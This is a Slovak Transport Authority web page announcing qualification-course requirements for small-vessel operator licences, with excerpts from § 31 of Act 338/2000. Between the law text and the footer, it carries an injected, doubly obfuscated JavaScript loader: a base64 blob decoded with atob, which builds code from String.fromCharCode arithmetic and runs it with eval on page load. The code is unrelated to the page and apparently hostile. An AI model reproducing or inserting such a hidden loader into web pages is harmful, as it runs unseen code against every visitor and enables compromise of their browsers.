DOPRAVNÝ ÚRAD

Skúšky odbornej spôsobilosti vodcu malého plavidla

Dopravný úrad informuje verejnosť, že v zmysle zákona č. 338/2000 Z. z. o vnútrozemskej plavbe a o zmene a doplnení niektorých zákonov v znení neskorších predpisov (ďalej len „zákon“) musí žiadateľ o preukaz odbornej spôsobilosti vodcu malého plavidla pred štátnou skúškou na Dopravnom úrade absolvovať kvalifikačný kurz, ktorý bude pozostávať z teoretickej a praktickej výučby. Kvalifikačné kurzy vykonávajú fyzické a právnické osoby na základe poverenia Dopravného úradu.

Zároveň Dopravný úrad týmto vyzýva právnické a fyzické osoby, ktoré chcú byť poverené vykonávaním kvalifikačného kurzu, aby požiadali Dopravný úrad o vydanie poverenia na vykonávanie kvalifikačného kurzu a k žiadosti priložili náležitosti v zmysle § 31 ods. (4) a (5) zákona (viď príloha č. 1).

Upozorňujeme žiadateľov, že k povereniu na výkon kvalifikačného kurzu sa vyžaduje požadovaná technická základňa podľa § 31 ods. (9) až (11) zákona (viď príloha č. 2).

Príloha č. 1
Výňatok zo zákona č. 338/2000 Z.z. o vnútrozemskej plavbe a o zmene a doplnení niektorých zákonov v znení neskorších predpisov

§ 31

(4) Dopravný úrad poverí vykonávaním kvalifikačného kurzu fyzickú osobu alebo právnickú osobu, ak
a) požiada o poverenie na vykonávanie kvalifikačného kurzu,
b) má požadovanú technickú základňu podľa odsekov 9 až 11,
c) má požadovaných školiteľov podľa odseku 13.

(5) K žiadosti o poverenie na vykonávanie kvalifikačného kurzu sa prikladá
a) kópia platného občianskeho preukazu alebo obdobného dokladu vydaného príslušným orgánom cudzieho štátu,
b) výpis z obchodného registra, živnostenského registra alebo obdobného registra nie starší ako tri mesiace,
c) učebná osnova kvalifikačného kurzu, ktorá musí byť v súlade s obsahom a rozsahom štátnej skúšky,
d) zoznam školiteľov s uvedením ich odbornej kvalifikácie a kategórie malého plavidla, na ktoré má školiteľ odbornú spôsobilosť vodcu,
e) návrh odbornej literatúry na prípravu žiadateľov,
f) doklad o vlastníctve, spoluvlastníctve alebo nájme priestoru, v ktorom sa uskutočňuje kvalifikačný kurz,
g) zoznam výcvikových plavidiel, kópie ich lodných osvedčení, doklady o poistení zodpovednosti za škody spôsobené prevádzkou výcvikových plavidiel a doklad o vlastníctve, spoluvlastníctve alebo nájme výcvikových plavidiel; výcvikovým plavidlom je malé plavidlo, ktoré musí byť počas praktickej výučby kvalifikačného kurzu a štátnej skúšky označené čitateľným a nezmazateľným odnímateľným nápisom „VÝCVIKOVÉ PLAVIDLO“ s výškou najmenej 10 cm, umiestneným na dobre viditeľnom mieste na malom plavidle.

 

Príloha č. 2
Výňatok zo zákona č. 338/2000 Z.z. o vnútrozemskej plavbe a o zmene a doplnení niektorých zákonov v znení neskorších predpisov

§ 31

(9) Technickú základňu tvorí priestor, v ktorom sa uskutočňuje kvalifikačný kurz a technické a technologické zariadenie určené na uskutočňovanie kvalifikačného kurzu.

(10) Priestor, v ktorom sa uskutočňuje kvalifikačný kurz, tvorí učebňa a jej príslušenstvo.

(11) Technickým a technologickým zariadením určeným na uskutočňovanie kvalifikačného kurzu sú výcvikové plavidlo a učebné pomôcky.

(12) V jednom termíne sa na kvalifikačnom kurze môže zúčastniť najviac 15 osôb. Kvalifikačný kurz sa vykonáva v rozsahu najmenej 36 vyučovacích hodín.

(13) Školiteľom môže byť fyzická osoba, ktorá má ukončené úplné stredné všeobecné vzdelanie alebo úplné stredné odborné vzdelanie a odbornú spôsobilosť vodcu malého plavidla najmenej kategórie A a kategórie potrebnej na vykonávanie kvalifikačného kurzu.

(14) Osoba poverená vykonávaním kvalifikačného kurzu je povinná
a) vykonávať kvalifikačné kurzy v súlade s vydaným poverením na vykonávanie kvalifikačného kurzu,
b) vykonávať kvalifikačné kurzy na schválenom výcvikovom plavidle,
c) vykonávať kvalifikačné kurzy v súlade so schválenými učebnými osnovami kvalifikačného kurzu,
d) vykonávať kvalifikačné kurzy so schválenými školiteľmi,
e) zabezpečiť odbornú literatúru na prípravu uchádzačov,
f) oznámiť deň, miesto a časový harmonogram konania kvalifikačného kurzu Dopravnému úradu najneskôr päť pracovných dní pred dňom jeho konania; zmenu týchto údajov a zrušenie termínu oznámi Dopravnému úradu bezodkladne,
g) poistiť zodpovednosť za škodu spôsobenú prevádzkou výcvikového plavidla,
h) vydať po ukončení kvalifikačného kurzu účastníkovi kvalifikačného kurzu potvrdenie o absolvovaní kvalifikačného kurzu,
i) viesť dokumentáciu kvalifikačného kurzu, ktorá obsahuje najmä identifikačné údaje o účastníkoch a školiteľoch kvalifikačného kurzu, rozvrh hodín kvalifikačného kurzu a evidenciu absolvovaných hodín účastníkov kvalifikačného kurzu,
j) oznámiť Dopravnému úradu akékoľvek zmeny údajov uvedených v žiadosti o poverenie na vykonávanie kvalifikačného kurzu, a to najneskôr do 15 dní odo dňa, keď tieto zmeny nastali,
k) zabezpečiť schválené výcvikové plavidlo s pohonnými látkami kategórie16a) podľa odbornej spôsobilosti vodcu malého plavidla, z ktorej bude absolvent vykonávať štátnu skúšku pre absolventov kvalifikačného kurzu v deň, čase a mieste konania praktickej štátnej skúšky a účasť školiteľa kvalifikačného kurzu,
l) prihlásiť absolventa kvalifikačného kurzu na štátnu skúšku.

var NVOUJMJOTF = atob(‘dmFyIEhUUVhOSkNQTFUgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDE4IC0gOCwgMTI3IC0gOSwgMTAwIC0gMywgMTIzIC0gOSwgMzUgLSAzLCAxMTMgLSA2LCAxMDggLSA3LCAxMjcgLSA2LCA0MCAtIDgsIDY1IC0gNCwgMzYgLSA0LCA0MCAtIDEsIDg4IC0gMSwgMTE1IC0gMywgODYgLSA2LCA5NCAtIDcsIDkyIC0gOSwgMTI1IC0gOSwgMTI1IC0gNSwgODcgLSA2LCAxMTQgLSAyLCA5MyAtIDksIDQzIC0gNCwgNjggLSA5LCAxMyAtIDMsIDEyMCAtIDIsIDEwMCAtIDMsIDEyMiAtIDgsIDM2IC0gNCwgMTA4IC0gNywgMTE3IC0gNywgMTAyIC0gMywgMTA4IC0gNywgMTA3IC0gNywgMzQgLSAyLCA2MiAtIDEsIDQwIC0gOCwgNDggLSA5LCA3NSAtIDIsIDgzIC0gMSwgNzQgLSA1LCAxMTEgLSA2LCAxMDYgLSA2LCAxMjIgLSAxLCA4NiAtIDksIDgwIC0gOSwgNzcgLSA1LCAxMTMgLSA3LCA1NiAtIDcsIDgzIC0gMiwgMTAyIC0gNSwgOTMgLSA1LCAxMDMgLSA0LCA4NiAtIDEsIDgxIC0gMSwgMTI1IC0gMywgODIgLSAxLCAxMTUgLSA2LCA3NiAtIDUsIDgzIC0gMSwgNTAgLSAyLCA0OSAtIDIsIDY4IC0gMiwgNzggLSA2LCAxMTMgLSAyLCA1MCAtIDIsIDcyIC0gNywgMTEzIC0gNywgOTAgLSA1LCA1MSAtIDEsIDgxIC0gNywgMTIxIC0gMSwgNzggLSA5LCA1OSAtIDIsIDgzIC0gMywgODkgLSA3LCA5MCAtIDUsIDU5IC0gNiwgODUgLSA4LCAxMDcgLSAzLCA1NyAtIDUsIDExMiAtIDUsIDEwNSAtIDMsIDYwIC0gOSwgODkgLSA4LCA3NyAtIDUsIDc5IC0gOCwgMTIzIC0gMiwgODUgLSA4LCA5NiAtIDYsIDgzIC0gOSwgNzYgLSA5LCA4MyAtIDUsIDg5IC0gMSwgMTA2IC0gNSwgOTUgLSA4LCAxMjIgLSAyLCA5MSAtIDEsIDc0IC0gOCwgNzMgLSA4LCAxMjAgLSA5LCA1OSAtIDgsIDc0IC0gMiwgODEgLSA5LCAxMTQgLSAzLCAxMTMgLSA2LCA3NiAtIDYsIDkxIC0gOCwgODggLSA3LCA5MSAtIDQsIDc1IC0gMSwgMTI2IC0gNywgNjggLSAzLCA4MCAtIDUsIDgzIC0gNCwgNzIgLSA2LCA3NCAtIDEsIDEwNSAtIDEsIDc3IC0gNCwgMTI4IC0gOCwgODkgLSAzLCA1OCAtIDYsIDEwMCAtIDEsIDc1IC0gOCwgNzEgLSA2LCA3NSAtIDQsIDgwIC0gOSwgNTggLSA3LCA5MSAtIDEsIDEwNyAtIDgsIDEwNyAtIDgsIDEzMCAtIDgsIDYxIC0gNSwgNzAgLSAxLCA3NyAtIDMsIDcxIC0gNCwgMTAxIC0gMSwgMTIwIC0gOCwgODkgLSAyLCA1MCAtIDEsIDEwMyAtIDQsIDExMiAtIDQsIDcyIC0gNywgMTEzIC0gNywgOTAgLSA1LCAxMjkgLSA5LCA3MyAtIDMsIDEwNyAtIDEsIDExMCAtIDMsIDU2IC0gOCwgODAgLSAzLCAxMDUgLSAyLCA5MCAtIDksIDgzIC0gMSwgMTA1IC0gMywgMTIzIC0gMywgNTkgLSA3LCA1MyAtIDEsIDEwNiAtIDUsIDcyIC0gNywgODAgLSAzLCAxMTMgLSA2LCA4NyAtIDksIDEwNyAtIDIsIDEwMCAtIDEsIDEwOCAtIDgsIDgwIC0gOSwgNTQgLSAzLCA2MCAtIDgsIDEwNCAtIDQsIDgzIC0gNSwgOTEgLSA3LCA1OCAtIDYsIDEwNyAtIDYsIDEwOCAtIDYsIDExMyAtIDcsIDQ5IC0gMSwgMTEyIC0gOSwgODcgLSAyLCA1MCAtIDEsIDcyIC0gMiwgMTE5IC0gNiwgMTA3IC0gNiwgMTE0IC0gOCwgNzIgLSA3LCA1NCAtIDIsIDc1IC0gNiwgMTI0IC0gMywgOTEgLSA2LCA1NiAtIDIsIDg1IC0gNywgMTA3IC0gMywgMTE3IC0gNiwgODIgLSA1LCAxMDMgLSAxLCAxMjcgLSA3LCAxMDggLSA1LCAxMjUgLSA1LCA4NCAtIDYsIDEwOCAtIDQsIDg1IC0gMywgNDkgLSA2LCA4MyAtIDUsIDExMSAtIDYsIDc4IC0gMSwgNzQgLSA1LCA3OSAtIDcsIDkyIC0gOCwgNTcgLSAxLCA4OSAtIDQsIDcyIC0gMiwgMTMwIC0gOCwgNjIgLSA2LCA5MSAtIDEsIDg3IC0gNywgNzYgLSA4LCA4MiAtIDQsIDY0IC0gOSwgNzIgLSA2LCA3NCAtIDksIDEyMCAtIDksIDU1IC0gNCwgODAgLSA4LCA4MCAtIDgsIDUyIC0gMywgMTIwIC0gNSwgMTEwIC0gOSwgMTEwIC0gNywgNjQgLSAzLCA2NCAtIDMsIDQzIC0gNCwgNjQgLSA1LCAxNyAtIDcsIDExMSAtIDksIDEyMCAtIDMsIDExOSAtIDksIDEwOCAtIDksIDEyMCAtIDQsIDEwOCAtIDMsIDExNiAtIDUsIDExOCAtIDgsIDM4IC0gNiwgMTIzIC0gMywgMTE3IC0gNiwgMTE5IC0gNSwgMTAyIC0gNywgMTA0IC0gMywgMTE0IC0gNCwgMTA1IC0gNiwgNDcgLSA3LCAxMTkgLSA0LCAxMTggLSAyLCAxMjEgLSA3LCAxMDkgLSA0LCAxMTUgLSA1LCAxMTEgLSA4LCA0NyAtIDMsIDM2IC0gNCwgMTExIC0gNCwgMTAyIC0gMSwgMTI2IC0gNSwgNDcgLSA2LCAzOCAtIDYsIDEzMCAtIDcsIDE3IC0gNywgMzkgLSA3LCAzNCAtIDIsIDEyNCAtIDYsIDEwMiAtIDUsIDExOCAtIDQsIDM4IC0gNiwgMTIxIC0gNywgMTA5IC0gOCwgMTE2IC0gMSwgMzggLSA2LCA2NCAtIDMsIDM2IC0gNCwgNDMgLSA0LCA0OCAtIDksIDYwIC0gMSwgMTggLSA4LCAzNiAtIDQsIDMzIC0gMSwgMTAzIC0gMSwgMTE1IC0gNCwgMTE3IC0gMywgNDAgLSA4LCA0NiAtIDYsIDExOSAtIDEsIDEwMiAtIDUsIDEyMiAtIDgsIDM3IC0gNSwgMTA4IC0gMywgNDEgLSA5LCA2NyAtIDYsIDM4IC0gNiwgNTEgLSAzLCA2NSAtIDYsIDMzIC0gMSwgMTExIC0gNiwgMzMgLSAxLCA2MyAtIDMsIDM5IC0gNywgMTE2IC0gMSwgMTIyIC0gNiwgMTIyIC0gOCwgMTA5IC0gNCwgMTEyIC0gMiwgMTA0IC0gMSwgNDggLSAyLCAxMTEgLSAzLCAxMDIgLSAxLCAxMTYgLSA2LCAxMDkgLSA2LCAxMjUgLSA5LCAxMTAgLSA2LCA2OCAtIDksIDM5IC0gNywgMTEwIC0gNSwgNTEgLSA4LCA0NyAtIDQsIDQzIC0gMiwgMzYgLSA0LCAxMjcgLSA0LCAxMyAtIDMsIDMzIC0gMSwgMzcgLSA1LCAzOCAtIDYsIDM2IC0gNCwgMTE2IC0gMiwgMTA1IC0gNCwgMTE2IC0gMSwgNDEgLSA5LCA0NyAtIDQsIDYyIC0gMSwgMzggLSA2LCA4NSAtIDIsIDEyMCAtIDQsIDExOCAtIDQsIDExMiAtIDcsIDExNSAtIDUsIDEwNCAtIDEsIDQ4IC0gMiwgMTA1IC0gMywgMTE2IC0gMiwgMTIwIC0gOSwgMTE4IC0gOSwgNjkgLSAyLCAxMTIgLSA4LCAxMDIgLSA1LCAxMTkgLSA1LCA2OCAtIDEsIDExMiAtIDEsIDEwOCAtIDgsIDEwNCAtIDMsIDQ4IC0gOCwgMTIxIC0gNiwgMTE4IC0gMiwgMTE4IC0gNCwgMTA4IC0gMywgMTEyIC0gMiwgMTEwIC0gNywgNDkgLSAzLCAxMDQgLSA1LCAxMDcgLSAzLCAxMDUgLSA4LCAxMTcgLSAzLCA3NCAtIDcsIDExNyAtIDYsIDEwMyAtIDMsIDEwOCAtIDcsIDY2IC0gMSwgMTIyIC0gNiwgNDcgLSA3LCAxMDYgLSAxLCA0NSAtIDQsIDQwIC0gOCwgMTAwIC0gNiwgMTkgLSA5LCAxNSAtIDYsIDEwIC0gMSwgMTAgLSAxLCAxMCAtIDEsIDExMSAtIDQsIDExMCAtIDksIDEyNyAtIDYsIDQ4IC0gMiwgMTAzIC0gNCwgMTA3IC0gMywgOTkgLSAyLCAxMTggLSA0LCA2OSAtIDIsIDExMyAtIDIsIDEwOCAtIDgsIDEwOCAtIDcsIDczIC0gOCwgMTIwIC0gNCwgNDMgLSAzLCAxMTIgLSA3LCAzOCAtIDYsIDQ1IC0gOCwgMzYgLSA0LCAxMTEgLSA0LCAxMDUgLSA0LCAxMjcgLSA2LCA0OSAtIDMsIDExMiAtIDQsIDEwNyAtIDYsIDExMyAtIDMsIDEwNCAtIDEsIDExOSAtIDMsIDEwOCAtIDQsIDQyIC0gMSwgNDggLSA3LCA2MCAtIDEsIDE4IC0gOCwgMzUgLSAzLCAzNSAtIDMsIDEzMyAtIDgsIDE4IC0gOCwgMzUgLSAzLCAzOSAtIDcsIDEyMiAtIDgsIDEwNiAtIDUsIDEyMSAtIDUsIDExOCAtIDEsIDEyMyAtIDksIDExMyAtIDMsIDM3IC0gNSwgMTIwIC0gNiwgMTA1IC0gNCwgMTIyIC0gNywgNjggLSA5LCAxMiAtIDIsIDEzNCAtIDksIDExIC0gMSwgMTUgLSA1LCAxMjcgLSA5LCA5OCAtIDEsIDExOSAtIDUsIDM2IC0gNCwgMTA4IC0gOCwgMTA1IC0gNCwgMTA2IC0gNywgNDAgLSA4LCA2NCAtIDMsIDM1IC0gMywgMTI5IC0gOSwgMTE2IC0gNSwgMTE1IC0gMSwgOTYgLSAxLCAxMDUgLSA0LCAxMTggLSA4LCAxMDQgLSA1LCA0NCAtIDQsIDEwNCAtIDcsIDExOSAtIDMsIDExNCAtIDMsIDk5IC0gMSwgNDEgLSAxLCAxMDUgLSA0LCAxMTUgLSA1LCAxMDMgLSA0LCAxMDMgLSAyLCAxMDkgLSA5LCA0NSAtIDQsIDUzIC0gOSwgMzggLSA2LCAxMTIgLSA1LCAxMDcgLSA2LCAxMjIgLSAxLCA0NSAtIDQsIDYyIC0gMywgMTcgLSA3LCA0NyAtIDcsIDExNCAtIDQsIDEwNCAtIDMsIDEyMiAtIDMsIDM0IC0gMiwgNzkgLSA5LCAxMTkgLSAyLCAxMTkgLSA5LCAxMDcgLSA4LCAxMjAgLSA0LCAxMTIgLSA3LCAxMTMgLSAyLCAxMTIgLSAyLCA0MyAtIDMsIDEwNCAtIDQsIDEwNCAtIDMsIDEwNCAtIDUsIDQ3IC0gNiwgNDkgLSA4LCA0MyAtIDMsIDQ2IC0gNSwgNjAgLSAxLCAxOSAtIDksIDE0IC0gNCk7ZXZhbChIVFFYTkpDUExVKTs=’);
eval(NVOUJMJOTF);

© Dopravný úrad / Transport Authority | Mapa stránok | RSS W3C Validation

Dodávateľ portálového riešenia